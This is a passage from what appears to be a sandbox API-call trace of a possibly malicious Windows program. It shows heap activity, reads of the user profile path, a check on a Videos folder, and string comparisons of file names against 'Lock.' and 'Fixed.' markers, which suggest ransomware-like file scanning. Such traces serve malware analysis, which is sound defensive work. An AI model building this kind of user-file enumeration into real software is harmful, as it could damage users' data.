hHeap=0x2af0000) returned 1 [0212.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0212.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0212.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74d28 [0212.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0212.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0212.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0212.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0212.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0212.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0212.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0212.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0212.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0212.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x46) returned 0x2a5dac0 [0212.615] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\desktop.ini", lpFilePart=0x8cf650*="desktop.ini") returned 0x22 [0212.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dac0 | out: hHeap=0x2af0000) returned 1 [0212.615] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\videos\\desktop.ini")) returned 0xffffffff [0212.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74d28 | out: hHeap=0x2af0000) returned 1 [0212.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0212.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0212.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0212.615] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0212.615] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.615] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0212.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0212.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0212.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0212.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0212.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0212.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0212.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kmyLNxqbxySO-S_H2O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="myLNxqbxySO-S_H2O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yLNxqbxySO-S_H2O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNxqbxySO-S_H2O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NxqbxySO-S_H2O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xqbxySO-S_H2O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qbxySO-S_H2O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bxySO-S_H2O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xySO-S_H2O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ySO-S_H2O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SO-S_H2O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O-S_H2O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-S_H2O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S_H2O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_H2O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H2O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0212.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0212.617] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0212.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0212.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0212.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0212.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0212.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0212.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0212.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0212.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0212.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0212.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6290 [0212.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kmyLNxqbxySO-S_H2O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="myLNxqbxySO-S_H2O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yLNxqbxySO-S_H2O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNxqbxySO-S_H2O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NxqbxySO-S_H2O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xqbxySO-S_H2O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qbxySO-S_H2O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bxySO-S_H2O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xySO-S_H2O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ySO-S_H2O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SO-S_H2O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O-S_H2O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-S_H2O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S_H2O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_H2O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H2O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O9.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa65d8 [0212.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa65d8 | out: hHeap=0x2af0000) returned 1 [0212.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0212.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0212.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0212.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0212.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0212.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0212.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.619] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0212.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0212.621] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0212.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0212.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0212.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719e8 [0212.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0212.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0212.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0212.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0212.622] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafd8 [0212.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab098 [0212.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0212.622] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0212.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0212.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0212.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0212.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0212.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74b88 [0212.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0212.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0212.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0212.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0212.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0212.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a78 [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0212.624] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0c8 [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaea0 [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0212.624] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0212.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0212.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0212.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0212.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0212.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: 